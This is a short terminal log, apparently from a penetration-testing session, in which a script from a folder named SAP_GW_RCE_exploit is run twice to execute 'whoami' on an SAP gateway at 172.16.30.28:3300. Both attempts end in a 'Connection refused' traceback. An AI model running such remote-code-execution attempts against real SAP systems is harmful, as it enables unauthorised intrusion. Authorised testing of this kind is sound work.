kali@kali:~/SAP_GW_RCE_exploit$ python SAPanonGWv1.py -t 172.16.30.28 -p 3300 -c whoami
[*] sending cmd:whoami
Traceback (most recent call last):
File "SAPanonGWv1.py", line 155, in
print run_cmd()
File "SAPanonGWv1.py", line 78, in run_cmd
return RCE_gw() # via gateway
File "SAPanonGWv1.py", line 85, in RCE_gw
result = exploit(cmd, param)
File "SAPanonGWv1.py", line 107, in exploit
s.connect((args.target, args.port))
File "/usr/lib/python2.7/socket.py", line 228, in meth
return getattr(self._sock,name)(*args)
socket.error: [Errno 111] Connection refused
kali@kali:~/SAP_GW_RCE_exploit$ python SAPanonGWv1.py -t 172.16.30.28 -p 3300 -c whoami
[*] sending cmd:whoami
Traceback (most recent call last):
File "SAPanonGWv1.py", line 155, in
print run_cmd()
File "SAPanonGWv1.py", line 78, in run_cmd
return RCE_gw() # via gateway
File "SAPanonGWv1.py", line 85, in RCE_gw
result = exploit(cmd, param)
File "SAPanonGWv1.py", line 107, in exploit
s.connect((args.target, args.port))
File "/usr/lib/python2.7/socket.py", line 228, in meth
return getattr(self._sock,name)(*args)
socket.error: [Errno 111] Connection refused